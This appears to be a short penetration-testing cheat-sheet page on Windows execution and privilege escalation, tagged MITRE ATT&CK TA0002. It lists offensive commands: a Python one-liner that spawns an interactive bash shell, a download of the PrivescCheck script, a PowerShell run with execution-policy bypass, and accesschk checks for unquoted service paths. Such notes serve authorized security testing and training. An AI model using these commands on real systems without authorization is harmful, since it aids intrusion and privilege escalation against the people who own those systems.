Skip to main content Link Menu Expand (external link) Document Search Copy Copied

pen / win / exec

Mitre Att&ck Entreprise: TA0002 - Execution

Menu

dl

dl = download

rshell

database

# run bash via python
python -c 'import pty; pty.spawn("/bin/bash")'

escalation

# download privescCheck.ps1
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1

# extended execution + txt report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"

# unquoted service path
accesschk /accepteula -uwdq "C:\Program Files\Unquoted Service Path"
accesschk /accepteula -uwdq "C:\Program Files (x86)\Windows Identity Foundation\v3.5\"